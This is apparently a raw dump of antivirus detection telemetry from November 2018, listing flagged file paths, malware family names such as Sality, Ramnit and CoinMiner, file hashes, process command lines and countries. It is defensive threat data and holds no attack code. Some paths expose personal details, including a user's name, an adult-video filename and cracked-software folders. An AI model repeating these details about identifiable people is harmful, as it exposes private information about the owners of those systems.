  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1ab832b6.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1ab832b6.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060904-dbfb9cc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_addb0e82\\AVSCAN-20181102-060833-D63163A7\\AVSCAN-20181102-060904-DBFB9CC9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274050001.scr', filepath='F:\\scan-peta-wb-sp2010\\3274050\\3274050001\\3274050001.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meatholes.12.06.16.taylor.rain.xxx.mp4-yapg.rar', filepath='G:\\MeatHoles.12.06.16.Taylor.Rain.XXX.MP4-YAPG-6\\.tmp\\MeatHoles.12.06.16.Taylor.Rain.XXX.MP4-YAPG.rar', filesize=384000, name='TR/Agent.htex.#M1.#R1'), hash='ada673aba9dfdc08450cd4a9536389522ebde8fe919a60b655f712c8de067ef1', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T00:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline='-m:invagent.dll -f:RunUpdate -cv:ACaVjszpmkqVIMpf.5 -oobe', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:49:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T00:39:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002903c9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002903c9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002908b9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002908b9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msbrofc.com', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\msbrofc.com', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M300.#R100957'), hash='c5a6e66d84bf05ad574d2906fba114f0a0cff57c98b8098c93f7bd1e1536dcf1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:36:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-29-004520/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002971c5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002971c5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291894', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291894', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002384dc', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002384dc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:22:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141012-4ae337af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-141012-4AE337AF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nmbcwriter.exe', filepath='C:\\Program Files\\Common Files\\Ahead\\Lib\\NMBCWriter.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='f686f7b925590fd1c0ffb2b677d6bbf8194f121791e39e466125012eb6d53cc3', metadata=Row(cmdline='--engine=2 --session-id=yI4zr4C9Fh3ziBybpQ\\\\\\/W7scmAW4Sw3JaHomNBCIv --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=12211320, timestamp='2018-11-04T05:17:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='D:\\Kituri\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='--flag-switches-begin --flag-switches-end --restore-last-session --flag-switches-begin --flag-switches-end --flag-switches-begin --flag-switches-end --flag-switches-begin --flag-switches-end', country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T11:27:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f53e8a1b34fc371db67eab9a8701ad956b9134e986687454c1725e378f73b8df', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:39:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='D:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:26:18Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-101118-b4d3d873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101118-B4D3D873', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='G:\\New folder\\data\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1617920, timestamp='2018-11-02T09:37:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-36.categorizing\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T11:11:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T17:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='1d2fdab4c416e82f199dddbdea045bf86a6c7fc1a38cbc3c6661975aeadb8c28', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:24:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\User\\Downloads\\Baixaki_aTube Catcher_3927752197.exe', parentsize=2292152, timestamp='2018-11-02T03:47:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='703165.doc', filepath='703165.doc', filesize=192000, name='W97M/Agent.3972612.#M0.#R0'), hash='58427503d5873da5fec241a685299b2b8b4addcd8f48f19aa6771d98f7f11f94', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:58:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ml_downloads.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\ml_downloads.dll', filesize=300000, name='W32/Ramnit.C.#M1.#R1'), hash='54ec09487b15d56a42e9f86db8dd74e6503ff11e6be761779946e525c9a59fe8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gSkA3JWuwEmNJRnJ.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:41:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1592fd65dfc94b23871c4dc6bd91127d33469894', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\1592fd65dfc94b23871c4dc6bd91127d33469894', filesize=384000, name='Adware/DealPly.418fd9.#M1.#R1'), hash='418fd9150667f7d2d319d7f43afa704e6ec91bcb8a5f7b648e2d638185af9a8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095407-8fb1d253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_793444eb\\AVSCAN-20181102-093900-8B975244\\AVSCAN-20181102-095407-8FB1D253', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='12400c625de5c6d1b2da77aa9bd992b2ab281639ccd3b30fee228558f86a89a4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:54:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00008cf8', filepath='C:\\Windows\\Temp\\7e07bae2-2977-4277-ae90-d6d5f573fbdf\\tmp000000b9\\tmp00008cf8', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='18490d25bdc19b6e58c1d25addef75fb7c3bf786fe1f1a8e49e7a42ac7b8f0a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.0.604.11072\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-02T11:06:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194001-f3856d02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192443-4FB98EEF\\AVSCAN-20181102-194001-F3856D02', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:40:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:49:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libwrapper30.exe', filepath='\\\\?\\D:\\A.CIVIL PROG\\revit14\\Autodesk_Revit_2014_English_Win_32-64bit_dlm\\x64\\RVT2014\\Program Files\\Common Files\\Autodesk Shared\\Revit Shared\\LibWrapper30.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='3653795d5ff63f218597bb5464d31cf664801140fbe632f54ef156dd108efcf7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:04:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131018-714acd00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131018-714ACD00', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094052-cfab4c03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0cd105dd\\AVSCAN-20181102-094020-CB98FC27\\AVSCAN-20181102-094052-CFAB4C03', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yolo.dll', filepath='Firmware.exe --> ProgramFilesDir/[PluginsDir]/yolo.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:48:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf.fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf', filepath='E:\\\xa0\\fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf.fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf', filesize=6528000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='3672a687f3861ef6834d437102378b9b5720315ef6d559b03fc2aa7bf17d088c', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:40Z'), dt=datetime.date(2018, 11, 2)),
